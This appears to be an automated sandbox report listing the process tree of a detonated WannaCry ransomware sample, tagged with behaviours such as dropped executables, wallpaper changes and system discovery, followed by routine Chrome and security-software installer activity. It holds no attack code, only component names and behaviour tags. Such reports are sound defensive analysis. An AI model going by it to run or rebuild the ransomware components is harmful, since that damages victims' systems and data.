C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Users\Public\Desktop\@[email protected]"C:\Users\Public\Desktop\@[email protected]"1⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef84f9758,0x7fef84f9768,0x7fef84f97782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1580 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2328 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2348 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1500 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3224 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3456 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3572 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4000 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2652 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2556 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2084 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4780 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4792 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5116 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5144 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5076 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\mbsetup-50010.50010.exe"C:\Users\Admin\Downloads\mbsetup-50010.50010.exe"2⤵
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=2004 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=2824 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2792 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=2024 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3940 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3760 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3596 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3756 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\avast_one_free_antivirus.exe"C:\Users\Admin\Downloads\avast_one_free_antivirus.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
-
C:\Windows\Temp\asw.ab48de9df46dd366\avast_one_essential_setup_online_x64.exe"C:\Windows\Temp\asw.ab48de9df46dd366\avast_one_essential_setup_online_x64.exe" /cookie:mmm_aon_012_999_a8j_m:dlid_AVAST-ONE-FREE-WIN-PPC /ga_clientid:da8f1572-aead-42d6-9faa-e2f1cda7d1a3 /edat_dir:C:\Windows\Temp\asw.ab48de9df46dd3663⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Checks processor information in registry
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3716 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=3388 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3588 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3480 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3496 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=3688 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=3768 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=3428 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=3940 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=2112 --field-trial-handle=1360,i,2567799838937568187,9339496970645873741,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Program Files\Windows Defender\MSASCui.exe"C:\Program Files\Windows Defender\MSASCui.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef84f9758,0x7fef84f9768,0x7fef84f97782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2316 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2556 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2636 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1388 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3352 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3372 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level2⤵
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x140057688,0x140057698,0x1400576a83⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3448 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2368 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=1480 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2272 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2224 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2512 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4068 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4036 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4020 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4052 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4232 --field-trial-handle=1304,i,13765862729648042200,16180135408272552283,131072 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\CCSetup.exe"C:\Users\Admin\Downloads\CCSetup.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\{DC2BEA56-E631-49D7-A1C8-32C95170C4A1}\CCSetup.exeC:\Users\Admin\AppData\Local\Temp\{DC2BEA56-E631-49D7-A1C8-32C95170C4A1}\CCSetup.exe /q"C:\Users\Admin\Downloads\CCSetup.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{DC2BEA56-E631-49D7-A1C8-32C95170C4A1}" /IS_temp3⤵
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{511A2DCD-3631-4721-8779-4BEB4BD01205}4⤵
-
-
